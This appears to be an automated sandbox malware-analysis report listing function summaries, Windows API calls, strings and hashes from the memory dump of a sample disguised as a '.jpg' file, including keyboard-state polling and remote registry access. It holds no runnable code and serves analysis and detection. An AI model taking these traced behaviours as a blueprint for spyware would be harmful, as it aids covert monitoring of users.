                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                          • API String ID: 3054410614-2561132961
                                                                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 600699880-22481851
                                                                                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow
                                                                                                          • String ID: static
                                                                                                          • API String ID: 3375834691-2160076837
                                                                                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                          • API String ID: 2907320926-3566645568
                                                                                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                          • DeleteObject.GDI32(006E0000), ref: 00470A04
                                                                                                          • DestroyIcon.USER32(00650065), ref: 00470A1C
                                                                                                          • DeleteObject.GDI32(F41A10DB), ref: 00470A34
                                                                                                          • DestroyWindow.USER32(00520045), ref: 00470A4C
                                                                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1237572874-0
                                                                                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                          APIs
                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706829360-0
                                                                                                          • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                                                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                          • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                                                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3413494760-0
                                                                                                          • Opcode ID: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                                                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                          • Opcode Fuzzy Hash: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                                                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                          • String ID: AU3_FreeVar
                                                                                                          • API String ID: 2634073740-771828931
                                                                                                          • Opcode ID: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                                                                                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                          • Opcode Fuzzy Hash: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                                                                                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 2294789929-1287834457
                                                                                                          • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                          • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                          APIs
                                                                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                          • API String ID: 2483343779-2107944366
                                                                                                          • Opcode ID: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                                                                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                          • Opcode Fuzzy Hash: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                                                                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                          • _wcslen.LIBCMT ref: 00450720
                                                                                                          • _wcscat.LIBCMT ref: 00450733
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                          • String ID: -----$SysListView32
                                                                                                          • API String ID: 4008455318-3975388722
                                                                                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                          • GetParent.USER32 ref: 00469C98
                                                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                          • GetParent.USER32 ref: 00469CBC
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 2360848162-1403004172
                                                                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
